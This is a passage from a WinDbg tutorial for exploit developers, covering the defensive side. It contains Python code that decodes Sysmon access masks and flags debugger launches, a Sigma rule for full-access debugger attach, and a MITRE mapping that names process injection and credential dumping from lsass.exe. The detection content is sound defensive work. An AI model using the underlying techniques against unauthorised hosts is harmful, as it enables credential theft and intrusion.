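The GrantedAccess field in that telemetry is a bitmask, so decoding it shows what the opener actually asked for. A minimal Python sketch using the process and standard access-right values defined in the Windows SDK; PROCESS_ALL_ACCESS is 0x1FFFFF on Vista and later, while a tool that only needs to read memory can request far less, for example 0x1010 (PROCESS_VM_READ | PROCESS_QUERY_LIMITED_INFORMATION). The HIGH_RISK grouping is an assumption chosen for illustration, not a standard definition.

```python
from typing import List, Tuple

# Process-specific and standard access rights, as defined in the Windows SDK (winnt.h).
ACCESS_RIGHTS = {
    0x000001: "PROCESS_TERMINATE",
    0x000002: "PROCESS_CREATE_THREAD",
    0x000004: "PROCESS_SET_SESSIONID",
    0x000008: "PROCESS_VM_OPERATION",
    0x000010: "PROCESS_VM_READ",
    0x000020: "PROCESS_VM_WRITE",
    0x000040: "PROCESS_DUP_HANDLE",
    0x000080: "PROCESS_CREATE_PROCESS",
    0x000100: "PROCESS_SET_QUOTA",
    0x000200: "PROCESS_SET_INFORMATION",
    0x000400: "PROCESS_QUERY_INFORMATION",
    0x000800: "PROCESS_SUSPEND_RESUME",
    0x001000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x010000: "DELETE",
    0x020000: "READ_CONTROL",
    0x040000: "WRITE_DAC",
    0x080000: "WRITE_OWNER",
    0x100000: "SYNCHRONIZE",
}
# Assumed "high-risk" subset: rights to create threads in, or operate on/read/write, target memory.
HIGH_RISK = 0x000002 | 0x000008 | 0x000010 | 0x000020


def decode(granted: str) -> Tuple[List[str], int]:
    """Decode a Sysmon GrantedAccess string (e.g. '0x1010') into right names,
    plus any set bits this table does not name."""
    mask = int(granted, 16)
    names = [name for bit, name in ACCESS_RIGHTS.items() if mask & bit]
    known = sum(bit for bit in ACCESS_RIGHTS if mask & bit)
    return names, mask & ~known


def is_high_risk(granted: str) -> bool:
    return bool(int(granted, 16) & HIGH_RISK)


print(decode("0x1010"))  # (['PROCESS_VM_READ', 'PROCESS_QUERY_LIMITED_INFORMATION'], 0)
```

Decoding 0x1FFFFF this way leaves 0xE000 unnamed, because PROCESS_ALL_ACCESS sets every bit in the low word, including ones this table does not list.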


12. Defensive Strategies & Detection

Debugger activity is observable through process-creation, handle-access, and named-pipe telemetry.

Sysmon Event ID                        Relevance
Event ID 1 (Process Create)            windbg.exe / windbgx.exe launch; command line reveals -p PID attach or -z dump
Event ID 10 (ProcessAccess)            Attach yields OpenProcess with GrantedAccess: 0x1fffff; SourceImage is windbg.exe
Event ID 8 (CreateRemoteThread)        Debugger-injection / anti-anti-debug patterns
Event ID 17/18 (Pipe Create/Connect)   Kernel debugging over \\.\pipe\...

Behavioral indicators for blue teams: windbg.exe -p <PID> on the command line (live attach), presence of dbgsrv.exe / ntsd.exe (remote/headless debug server), msec.dll loaded into a session (active exploitability assessment), and .run TTD trace files written to disk.
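The command-line indicators above translate into a simple first-pass filter over Sysmon Event ID 1 or Security Event 4688 records. A minimal Python sketch, assuming the Image and CommandLine fields are already extracted as strings; the image list (which adds cdb.exe, the console debugger) and the regexes are illustrative rather than a complete or published rule.

```python
import re
from pathlib import PureWindowsPath
from typing import List

# Illustrative image list drawn from the indicators above, plus cdb.exe (assumption).
DEBUGGER_IMAGES = {"windbg.exe", "windbgx.exe", "cdb.exe", "ntsd.exe", "dbgsrv.exe"}
ATTACH_RE = re.compile(r"(?:^|\s)-p\s+(?:0x[0-9a-f]+|\d+)\b", re.IGNORECASE)  # attach by PID
DUMP_RE = re.compile(r"(?:^|\s)-z\s+\S+", re.IGNORECASE)                       # open a dump


def classify(image: str, command_line: str) -> List[str]:
    """Return the indicator labels a process-creation record matches."""
    name = PureWindowsPath(image).name.lower()
    if name not in DEBUGGER_IMAGES:
        return []
    hits = ["debugger-launch"]
    if ATTACH_RE.search(command_line):
        hits.append("live-attach")
    if DUMP_RE.search(command_line):
        hits.append("dump-open")
    if name == "dbgsrv.exe":
        hits.append("remote-debug-server")
    return hits


print(classify(r"C:\Debuggers\x64\windbg.exe", "windbg.exe -p 1234"))
```

A live-attach hit is the one to correlate with a matching Event ID 10 record for the same target PID.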

A Sigma rule for full-access process attach by a debugger:

title: Debugger Full-Access Attach to Process
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    SourceImage|endswith:
      - '\windbg.exe'
      - '\windbgx.exe'
    GrantedAccess: '0x1fffff'
  condition: selection
level: medium
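Before deploying the rule, its selection logic is small enough to mirror in a few lines for testing against sample events. A minimal Python approximation, assuming events arrive as dicts keyed by Sysmon field names; it imitates Sigma's default case-insensitive string matching for these three fields only and is not a general Sigma engine.

```python
def rule_matches(event: dict) -> bool:
    """Approximate the selection: EventID 10, debugger SourceImage, full access."""
    source = str(event.get("SourceImage", "")).lower()
    return (
        int(event.get("EventID", -1)) == 10
        # The leading backslash keeps e.g. 'notwindbg.exe' from matching.
        and source.endswith(("\\windbg.exe", "\\windbgx.exe"))
        # Sigma compares strings case-insensitively by default, so 0x1FFFFF matches too.
        and str(event.get("GrantedAccess", "")).lower() == "0x1fffff"
    )


sample = {"EventID": 10, "SourceImage": r"C:\Debuggers\x64\WinDbg.exe",
          "GrantedAccess": "0x1FFFFF"}
print(rule_matches(sample))  # True
```

Because GrantedAccess is matched exactly, a handle opened with a narrower mask such as 0x1010 does not fire this rule.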

Pair Sysmon with the Microsoft-Windows-Kernel-Process ETW provider and Security Event 4688 (enable Audit Process Creation with command-line capture). Restrict SeDebugPrivilege, which Administrators hold by default, on production hosts so that accounts without a need for it cannot attach to other users’ or SYSTEM processes, and never expose kernel-debug ports on networked machines.

MITRE ATT&CK Mapping

Technique                          MITRE ID    Detection
Native API                         T1106       EDR hooks on OpenProcess / ReadProcessMemory
Process Injection                  T1055       Sysmon Event ID 10, GrantedAccess masks
Process Injection: DLL Injection   T1055.001   LdrLoadDll / .load activity in traces
Debugger Evasion                   T1622       IsDebuggerPresent / heap-flag / timing probes
OS Credential Dumping              T1003       Handle access to lsass.exe (authorized DFIR only)
System Information Discovery       T1082       !peb / !teb / lm-equivalent runtime recon

13. Tools for WinDbg Analysis

Tool                      Description                                Link
WinDbg Preview            Modern debugger with TTD                   microsoft.com
WinDbg Classic            SDK/WDK debugger for headless scripting    microsoft.com
Process Hacker            Live handle / memory inspection            processhacker.sourceforge.io
Process Monitor           File / registry / process tracing          live.sysinternals.com
x64dbg                    User-mode disassembler-debugger            x64dbg.com
Ghidra                    Static reverse engineering                 ghidra-sre.org
Volatility                Memory-forensics framework                 volatilityfoundation.org
msec.dll (!exploitable)   Heuristic exploitability triage            MSEC release

14. Summary

  • WinDbg is the exploit developer’s primary lens into a faulting Windows process — and mastering it means mastering the telemetry attackers generate.
  • Correct symbol configuration (.sympath, .reload /f, !sym noisy) is the prerequisite that makes every other command meaningful.
  • !analyze -v, !exchain, and !heap turn a raw access violation into a root-caused, classified crash; dx queries and TTD let you step backward to the exact corrupting write.
  • Master all breakpoint types — bp, bu, bm, hardware ba, one-shot /1, command and dx-conditional breaks — to control execution precisely.
  • Detect debugger and attach activity via Sysmon Event ID 1 and 10 (GrantedAccess: 0x1fffff), Event 4688 command-line auditing, and restricted SeDebugPrivilege on production hosts.


References